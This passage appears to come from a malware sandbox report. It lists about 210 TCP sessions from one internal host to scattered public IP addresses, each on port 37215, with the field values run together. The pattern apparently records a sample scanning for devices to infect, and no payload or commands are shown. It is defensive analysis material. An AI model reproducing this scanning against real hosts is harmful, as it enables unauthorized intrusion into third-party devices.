                                                          5322192.168.2.154938491.27.121.16037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5323192.168.2.156085841.146.168.16237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5324192.168.2.153458841.212.42.18137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5325192.168.2.1536926123.137.24.17837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5326192.168.2.1543442157.252.112.17637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5327192.168.2.1537384197.253.185.14337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5328192.168.2.1556740157.160.180.8837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5329192.168.2.1550854181.234.155.11637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5330192.168.2.1546134199.76.93.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5331192.168.2.154028041.179.99.24537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5332192.168.2.1548072157.17.199.18537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5333192.168.2.153301641.105.108.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5334192.168.2.1554016157.83.48.24537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5335192.168.2.1550050157.96.50.7237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5336192.168.2.1535740157.52.120.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5337192.168.2.154427241.68.147.15537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5338192.168.2.1560926184.163.92.18837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5339192.168.2.1539794197.133.138.24237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5340192.168.2.154066865.115.187.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5341192.168.2.1534178157.12.254.22237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5342192.168.2.1554118157.158.86.5837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5343192.168.2.1550172197.6.180.2937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5344192.168.2.1551040157.137.60.21237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5345192.168.2.1549542157.235.65.21137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5346192.168.2.155354441.9.90.12437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5347192.168.2.1554570197.216.111.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5348192.168.2.1559206210.36.123.12037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5349192.168.2.155568441.232.80.24137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5350192.168.2.1554962197.80.214.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5351192.168.2.1549508157.122.170.437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5352192.168.2.1541224197.242.134.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5353192.168.2.1547518157.115.75.25137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5354192.168.2.154861641.180.6.21537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5355192.168.2.1555290194.5.213.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5356192.168.2.1549986142.108.144.17437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5357192.168.2.1555208197.248.12.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5358192.168.2.1541252197.206.133.8437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5359192.168.2.155543041.109.174.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5360192.168.2.1532956197.0.105.3337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5361192.168.2.153950041.98.182.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5362192.168.2.1559812157.234.59.12137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5363192.168.2.154083641.116.52.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5364192.168.2.1543074140.1.105.21137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5365192.168.2.1544758197.96.245.8137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5366192.168.2.154903441.159.55.8837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5367192.168.2.1534610197.81.86.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5368192.168.2.154699293.251.204.19137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5369192.168.2.1535914142.68.221.3737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5370192.168.2.155812641.5.19.24337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5371192.168.2.1535992157.22.146.8537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5372192.168.2.153360058.202.196.25237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5373192.168.2.1533034157.224.10.6437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5374192.168.2.155775641.239.0.12437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5375192.168.2.154715241.43.200.4637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5376192.168.2.154353273.95.149.737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5377192.168.2.153474241.203.234.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5378192.168.2.1535732130.218.72.9237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5379192.168.2.1552078157.17.163.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5380192.168.2.1559602162.228.215.20637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5381192.168.2.1548704197.203.59.1637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5382192.168.2.1534856197.75.100.16537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5383192.168.2.154061441.254.196.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5384192.168.2.1544450197.7.182.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5385192.168.2.154384470.66.245.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5386192.168.2.1554610172.153.158.22237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5387192.168.2.153715431.223.161.637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5388192.168.2.1544684197.237.28.24037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5389192.168.2.154283841.219.89.19037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5390192.168.2.1533476197.179.129.21237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5391192.168.2.1550966197.235.89.22137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5392192.168.2.153540041.216.158.10837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5393192.168.2.153795265.4.186.17137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5394192.168.2.155784444.213.25.17537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5395192.168.2.1550692157.66.240.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5396192.168.2.1542974124.82.220.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5397192.168.2.1538016126.194.143.16137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5398192.168.2.1552508197.216.24.9637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5399192.168.2.155410841.1.125.20437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5400192.168.2.1533986197.145.238.13237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5401192.168.2.155587041.243.191.17837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5402192.168.2.1535192140.96.170.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5403192.168.2.153948472.246.241.19637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5404192.168.2.1535764157.51.123.12537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5405192.168.2.153345841.7.0.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5406192.168.2.1541036157.41.47.8737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5407192.168.2.1537228197.179.127.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5408192.168.2.1538650197.132.133.20637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5409192.168.2.1533280197.236.98.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5410192.168.2.1546516197.113.45.24037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5411192.168.2.154633241.141.248.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5412192.168.2.1548890197.180.6.11837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5413192.168.2.154318441.231.193.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5414192.168.2.1537464157.241.42.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5415192.168.2.1537692144.144.136.18137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5416192.168.2.1547116157.195.199.5037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5417192.168.2.1540720157.164.21.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5418192.168.2.1553488157.192.133.15237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5419192.168.2.1536950157.101.237.1337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5420192.168.2.154561846.207.198.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5421192.168.2.1555282197.150.8.17137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5422192.168.2.1550626157.22.184.17937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5423192.168.2.1538040197.24.139.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5424192.168.2.155055041.56.131.21537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5425192.168.2.154116614.156.31.25037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5426192.168.2.154686890.89.160.21637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5427192.168.2.1541324223.162.88.25037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5428192.168.2.1549908120.243.148.9137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5429192.168.2.1548576218.15.251.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5430192.168.2.155993641.249.36.1737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5431192.168.2.1550800197.121.255.21737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5432192.168.2.1535878197.82.176.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5433192.168.2.1558628197.255.71.23937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5434192.168.2.1538820197.181.122.3437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5435192.168.2.1546520157.208.227.16837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5436192.168.2.1549448157.50.169.21037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5437192.168.2.1537322157.22.121.8937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5438192.168.2.1538094197.49.154.13237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5439192.168.2.1559144197.53.185.19837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5440192.168.2.1533786119.234.254.7937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5441192.168.2.1534918197.123.153.17937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5442192.168.2.1557394197.197.38.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5443192.168.2.1537794157.235.225.15637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5444192.168.2.1535378157.243.18.15037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5445192.168.2.1540706197.184.15.1337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5446192.168.2.1533188157.189.107.12537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5447192.168.2.153384641.68.203.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5448192.168.2.1547500197.62.19.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5449192.168.2.1547486197.2.150.18437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5450192.168.2.1536352157.45.222.8137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5451192.168.2.1539190157.163.82.3437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5452192.168.2.1552234197.30.214.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5453192.168.2.154089041.13.16.8437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5454192.168.2.153343258.66.114.12537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5455192.168.2.153615241.99.90.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5456192.168.2.1538224157.223.43.11237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5457192.168.2.1545624197.243.39.18237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5458192.168.2.1547002115.125.186.9137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5459192.168.2.1560588177.183.183.1737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5460192.168.2.1546532176.220.174.5837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5461192.168.2.1551486157.225.44.11637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5462192.168.2.1542390197.213.211.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5463192.168.2.1559516197.54.213.437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5464192.168.2.1558824197.162.102.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5465192.168.2.154849841.114.148.7337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5466192.168.2.1534262218.126.24.20137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5467192.168.2.155922665.71.230.21437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5468192.168.2.1560184182.17.90.7137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5469192.168.2.1534044157.88.201.5537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5470192.168.2.155624841.12.59.22037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5471192.168.2.1557920197.111.137.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5472192.168.2.1550418157.155.214.20537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5473192.168.2.153613834.182.188.1637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5474192.168.2.153891096.48.91.6237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5475192.168.2.154740241.116.232.10737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5476192.168.2.155436041.61.27.5537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5477192.168.2.153826058.207.228.11537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5478192.168.2.154841678.73.104.13337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5479192.168.2.1557982197.174.139.24837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5480192.168.2.153793241.236.46.3037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5481192.168.2.1548580197.116.18.22937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5482192.168.2.1550032157.196.13.17937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5483192.168.2.156070041.180.81.13637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5484192.168.2.1543066192.103.109.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5485192.168.2.154760441.24.162.3737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5486192.168.2.154447641.201.219.13637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5487192.168.2.1544054217.21.242.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5488192.168.2.153662441.84.9.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5489192.168.2.1539418157.82.60.1837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5490192.168.2.156046241.12.44.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5491192.168.2.1533224157.130.101.6737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5492192.168.2.153527641.88.183.8337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5493192.168.2.1537506197.250.92.20637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5494192.168.2.1553970157.13.230.19337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5495192.168.2.1551182103.158.32.5037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5496192.168.2.154289441.141.227.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5497192.168.2.1539614197.82.250.4437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5498192.168.2.154517441.133.116.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5499192.168.2.1558900197.249.158.13637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5500192.168.2.1542330107.244.214.18837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5501192.168.2.155442241.64.39.13837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5502192.168.2.153443041.214.224.14337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5503192.168.2.153467841.191.34.22837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5504192.168.2.1542304197.144.92.7237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5505192.168.2.154010041.65.220.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5506192.168.2.1553836157.82.221.2337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5507192.168.2.154761071.108.49.2637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5508192.168.2.1545274157.205.150.21937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5509192.168.2.1545178212.82.92.12037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5510192.168.2.1541498157.243.73.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5511192.168.2.153458641.165.225.8437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5512192.168.2.1555598189.204.213.6537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5513192.168.2.1559098197.34.154.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5514192.168.2.1539908157.176.41.21637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5515192.168.2.1548346157.13.184.22837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5516192.168.2.1542904197.34.105.7737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5517192.168.2.155587619.141.233.3137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5518192.168.2.153438441.11.142.737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5519192.168.2.1557714197.135.156.11737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5520192.168.2.154402441.112.150.637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5521192.168.2.155103641.195.26.17137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5522192.168.2.1547236197.121.91.19637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5523192.168.2.1552500144.139.6.17337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5524192.168.2.155103493.98.77.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5525192.168.2.155287041.230.208.18037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5526192.168.2.153425846.197.20.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5527192.168.2.154133641.222.70.15537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5528192.168.2.1535490157.238.54.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5529192.168.2.153557041.196.243.3437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5530192.168.2.1560732116.34.45.16637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5531192.168.2.1556920157.196.27.10937215
